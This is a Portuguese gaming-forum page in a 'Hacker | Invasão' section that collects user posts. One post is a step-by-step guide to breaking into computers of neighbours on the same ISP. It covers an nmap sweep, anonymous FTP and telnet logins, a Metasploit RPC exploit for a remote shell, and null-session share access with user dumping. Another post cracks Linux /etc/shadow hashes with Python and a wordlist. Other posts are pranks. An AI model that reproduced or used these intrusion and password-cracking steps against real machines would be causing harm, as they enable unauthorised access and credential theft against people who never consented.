Ir para conteúdo
View in the app

A better way to browse. Learn more.

GGames Fórum

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Hacker | Invasão

  1. Basta abrir o console (F12) e ir na aba console e aplicar o seguinte código
     
    • 4.890 visualizações
    • 9 comentários
    Por asdasad33
    Enviado
  2. Estes ataques precisam ter pessoas do mesmo provedor que você.
    Vamos começar:
    1. Pegue o seu ip externo(sugestão: www.meuip.com.br).
    2. Baixe o nmap e instale no seu pc.
    3.  Vamos supor que o seu ip seja: 201.33.22.18.
    4. Entre no prompt comando do Windows e digite nmap. Aparecerá um montão de opções e ajudas para você aprende a utilizar.
    Prosseguindo…
    5. Iremos fazer scanner de portas nos computadores da sua redondeza que tem o mesmo provedor que você.
    6.  digite:
    nmap -sV -T Insane -A -v  201.33.22.1-254 -p21,23,135,44
    Pronto vai listar todas as portas abertas de todos os usuários da sua banda larga ou do seu bairro, estado etc depende da sua banda.
    7. Código:
    Discovered open port 21/tcp on 201.33.22.223
    Discovered open port 23/tcp on 201.33.22.1
    Discovered open port 23/tcp on 201.33.22.186
    Discovered open port 445/tcp on 201.33.22.14
    Discovered open port 445/tcp on 201.33.22.97
    Discovered open port 445/tcp on 201.33.22.24
    Discovered open port 445/tcp on 201.33.22.152
    Discovered open port 445/tcp on 201.33.22.149
    Discovered open port 445/tcp on 201.33.22.81
    Discovered open port 445/tcp on 201.33.22.69
    Discovered open port 445/tcp on 201.33.22.9
    Discovered open port 445/tcp on 201.33.22.55
    Discovered open port 445/tcp on 201.33.22.113
    Discovered open port 445/tcp on 201.33.22.218
    Discovered open port 445/tcp on 201.33.22.21
    Discovered open port 445/tcp on 201.33.22.107
    Discovered open port 445/tcp on 201.33.22.111
    Discovered open port 445/tcp on 201.33.22.56
    Discovered open port 445/tcp on 201.33.22.178
    Discovered open port 445/tcp on 201.33.22.191
    Discovered open port 445/tcp on 201.33.22.157
    Discovered open port 445/tcp on 201.33.22.127
    Discovered open port 445/tcp on 201.33.22.29
    Discovered open port 445/tcp on 201.33.22.207
    Discovered open port 135/tcp on 201.33.22.175
    Discovered open port 135/tcp on 201.33.22.164
    Invasao pela porta 21
    vamos lá… ira aparecer um tanto de computadores que tem a porta 21 aberta. Todos aqueles que tiverem a mesma aberta. Voce pode tentar logar como anonymous, pois alguns administradores ou pessoas nao si preocupam em retirar o usuario anonymous do ftp.
    Iniciar>Executar>cmd>ftp>open>201.33.22.223>anonymous>a
    Invasao pela porta 23
    Iniciar>Executar>cmd>telnet>open>201.33.22  23
    Invasao pela porta 135
    CASO a porta 135 aberta, podemos usar o METASPLOIT
    abra o metasploit na interface web. procure pelo exploit MICROSOFT RPC.
    depois disso escolha o tipo de conexao como: GERENICSHELL_BLIND_TCP ou voce que sabe o tipo de conexao a ser usada.
    depois disso matenha as informaçoes padroes do metasploit só inclua o ip da vitima, pois so o Windows dele nao for atualizado, ele ja vem como shell. Essa invasão rpc dcom já ficou obsoleta também.
    Invasao pela porta 445
    Esta porta é de compartilhamento.
    Iniciar>Executar>cmd>net use .45.241.175ipc$ “” /u:”"
    Comando concluído com êxito.
    baixa o Dumpusers
    ponha ele no ?
    abra o cmd digite;
    dumpusers -target 201.45.241.175 -type notdc -start 1 -stop 900 -mode verbose
    depois você vai no:
    iniciar>executar>.45.241.175c$
    • 1.817 visualizações
    • 0 comentários
    Enviado
  3. from time import sleep  from pyautogui import press, typewrite  t = open("roteiro.txt" , "r") for x in t:      typewrite(word)     press("enter")     sleep(0)


    O código, é esse. Entretanto, na mesma pasta na qual estiver o arquivo em Python, você vai precisar colocar o roteiro em txt nela. (E caso ele tenha um nome diferente, é só alterar no código)

    É algo que dá pra gerar algumas risadas.
    • 5.233 visualizações
    • 0 comentários
    Por Krill
    Enviado
  4. Sabemos que existem vários scripts já prontos para quebrar senhas do Linux, porém melhor do que saber usar alguma ferramenta pronta, é saber como ela funciona e como criar seu script. Por este motivo iremos mostrar como criar um script em python para quebrar senhas do Linux através de uma wordlist.
    Primeiramente precisamos entender como funcionar as senhas no Linux, as senhas no Linux são armazenadas no arquivo /etc/shadow e este arquivo armazena a senha real no formato criptografado (mais parecido com o hash da senha) para a conta do usuário com propriedades adicionais relacionadas à senha do usuário. Basicamente, ele armazena informações seguras da conta do usuário. Todos os campos são separados por dois pontos (:). Ele contém uma entrada por linha para cada usuário listado no arquivo /etc/passwd, conforme exemplo abaixo.
    [root@centos ~]# head -n1 /etc/shadow
    root:$6$UXCFfDA3$xvrZI5Sn/52dwMAbkjC1wwxepW5AsICxtwpnfCoEErCO7.
    8ZjOndhZjr82RFqtQOASFBJ4jyHwcnwKFD8JqKH/:17700:0:99999:7::
    1º Campo: Usuário de acesso.
    2º Campo: Senha do usuário criptografada.
    A senha deve ter no mínimo 8 a 12 caracteres, incluindo caracteres especiais, dígitos, letras minúsculas e muito mais. Geralmente o formato da senha é definido como $id$salt$hash, O $id é o algoritmo usado no GNU/Linux da seguinte forma:
    $1$ – MD5
    $2a$ – Blowfish
    $2y$ – Blowfish
    $5$ – SHA-256
    $6$ – SHA-512
    Vamos apenas focar nos dois primeiros campos pois somente iremos usar eles para descobrirmos a senha do usuário.
    Agora vamos para o que interessa, primeiro iremos executar os comandos no modo interativo e no final irei deixar o exemplo de um script para automatizar o processo.
    Execute o comando python no Linux:
    [root@centos ~]# python
    Python 2.7.5 (default, Aug 4 2017, 00:39:18)
    [GCC 4.8.5 20150623 (Red Hat 4.8.5-16)] on linux2
    Type "help", "copyright", "credits" or "license" for more information.
    >>>
    Importe a biblioteca crypt:
    >>> import crypt
    Crie uma variável com id e o salt da senha contida no arquivo shadow:
    >>> salt = "$6$UXCFfDA3"
    Agora iremos executar a função crypt e analisar a saída do comando:
    >>> crypt.crypt("password", salt) '$6$UXCFfDA3$xvrZI5Sn/52dwMAbkjC1wwxepW5AsICxtwpnfCoEErCO7.
    8ZjOndhZjr82RFqtQOASFBJ4jyHwcnwKFD8JqKH/'
    A função crypt recebe dois parâmetros, sendo eles, uma senha e o salt com o id. Neste caso estamos passando a senha sendo “password” e o salt com o id que pegamos no arquivo shadow “$6$UXCFfDA3”.
    Podemos notar que a saída do comando crypt é exatamente igual a linha que temos no arquivo shadow para o usuário root:
    [root@centos ~]# head -n1 /etc/shadow
    root:$6$UXCFfDA3$xvrZI5Sn/52dwMAbkjC1wwxepW5AsICxtwpnfCoEErCO7.
    8ZjOndhZjr82RFqtQOASFBJ4jyHwcnwKFD8JqKH/:17700:0:99999:7:::
    >>> crypt.crypt("password", salt)
    '$6$UXCFfDA3$xvrZI5Sn/52dwMAbkjC1wwxepW5AsICxtwpnfCoEErCO7.
    8ZjOndhZjr82RFqtQOASFBJ4jyHwcnwKFD8JqKH/'
    Comparando as duas saídas, podemos identificar que a senha do usuário root neste caso é password.
    Agora conforme prometido, segue o script automático ao qual você irá passar o arquivo shadow e uma wordlist como parâmetro e ele fará todo o resto!
    [root@centos ~]# cat HSLinuxPWD.py
    Use o código: https://github.com/TiagoANeves/TDTLinuxPWD
    Executando o script:
    [root@centos ~]# python HSLinuxPWD.py -s /etc/shadow -w wordlist.txt
    Iniciando o programa...
    Bruteforcing a senha do usuario root
    Testando a senha 123456
    Testando a senha 12345
    Testando a senha 123456789
    Testando a senha password
    Senha encontrada! Password
    Obrigado e até o próximo tutorial!
    • 3.568 visualizações
    • 4 comentários
    Enviado
  5. Se você quer zoar seus amigos simulando uma atualização INFINITA de sistema operacional, é bem fácil! 

    Acesse http://fakeupdate.net/  Clique na tela correspondente ao sistema operacional desejado. Aperte F11 para deixar a tela em FULLSCREEN. Aí é só olhar o tonto esperando terminar a atualização.
    • 4.292 visualizações
    • 8 comentários
    Enviado

Configure browser push notifications

Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.